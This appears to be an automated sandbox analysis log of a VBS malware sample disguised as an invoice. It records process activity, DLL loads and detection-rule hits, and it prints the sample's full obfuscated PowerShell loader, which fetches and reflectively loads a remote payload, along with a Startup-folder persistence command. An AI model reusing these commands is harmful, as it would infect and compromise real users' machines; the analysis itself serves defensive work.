Source: powershell.exe, 00000008.00000002.1667066849.000001B9C826E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C826E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee/d/DjfVC/0
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C94EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercont
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C90BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C8043000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C8043000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C8215000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C8334000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C8359000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C8349000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C8334000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C8359000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49709 version: TLS 1.2

System Summary

Source: Process Memory Space: powershell.exe PID: 4832, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4844, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')')
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')')
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6JysnLy9yYXcuZ2l0aCcrJ3ViJysndScrJ3NlcmMnKydvbicrJ3QnKydlbnQuY29tL05vRGV0ZWN0JysnT24nKycvTicrJ28nKydEJysnZXRlY3RPbi9yZWZzJysnL2gnKydlYWRzL21haScrJ24vRGV0JysnYWgnKydObycrJ3RoLVYudHh0JysneycrJzJ9OycrJyB7MH0nKydiYScrJ3NlNjQnKydDb250ZScrJ250JysnICcrJz0gKE5ldy0nKydPYicrJ2plYycrJ3QgU3knKydzdGVtLk5lJysndC5XJysnZScrJ2JDbGknKydlbnQpLkQnKydvd25sb2FkU3RyJysnaScrJ24nKydnKHswfScrJ3VybCk7JysnICcrJ3snKycwJysnfWJpbicrJ2FyeUNvJysnbnRlJysnbicrJ3QgJysnPSAnKydbU3lzJysndGVtJysnLicrJ0MnKydvbnZlcicrJ3RdJysnOicrJzonKydGcicrJ29tQmFzJysnZTY0U3QnKydyJysnaW5nJysnKHswfWInKydhcycrJ2U2NEMnKydvJysnbicrJ3RlbicrJ3QpOyB7MH1hcycrJ3NlbWJseSA9ICcrJ1snKydSZWZsJysnZWN0aW9uLkFzJysncycrJ2VtYmx5JysnXTo6TCcrJ29hZCh7JysnMCcrJ30nKydiaW5hcnlDbycrJ250JysnZW4nKyd0KTsgW2RubGliJysnLkknKydPLkhvbWVdJysnOjpWQScrJ0koJysnezEnKyd9JysnMC9DVmZqRCcrJy8nKydkL2VlLmV0c2EnKydwJysnLycrJy86Jysnc3B0JysndCcrJ2gnKyd7MX0sIHsnKycxJysnfWRlJysnc2F0aScrJ3YnKydhZG97MX0nKycsICcrJ3snKycxfWRlc2F0aXYnKydhZG97JysnMX0nKycsJysnICcrJ3sxfScrJ2Rlc2EnKyd0aXYnKydhZG97MX0sIHsxJysnfU1TQnVpJysnbCcrJ2R7MX0sICcrJ3sxJysnfXsxfSwnKyd7MX17MX0nKycpJykgLWYgIFtjaGFSXTM2LFtjaGFSXTM0LFtjaGFSXTM5KXwmKCAoW1NUcmluZ10kdkVSYk9zZXBSZWZlUmVuY0UpWzEsM10rJ3gnLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FFB4AB43292
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFB4AB631D2
Source: FAKTURA-pdf-466366332.vbs | Initial sample: Strings found which are bigger than 50
Source: Process Memory Space: powershell.exe PID: 4832, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4844, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal100.troj.expl.evad.winVBS@13/7@2/3
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7008:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5880:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_alcz2i0u.sd4.ps1
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-pdf-466366332.vbs"
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: FAKTURA-pdf-466366332.vbs | Virustotal: Detection: 9%
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')"
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\PING.EXE | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE | Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb; source: powershell.exe, 00000008.00000002.1730333035.000001B9DFF13000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.1742752814.00007FFB4ACD0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
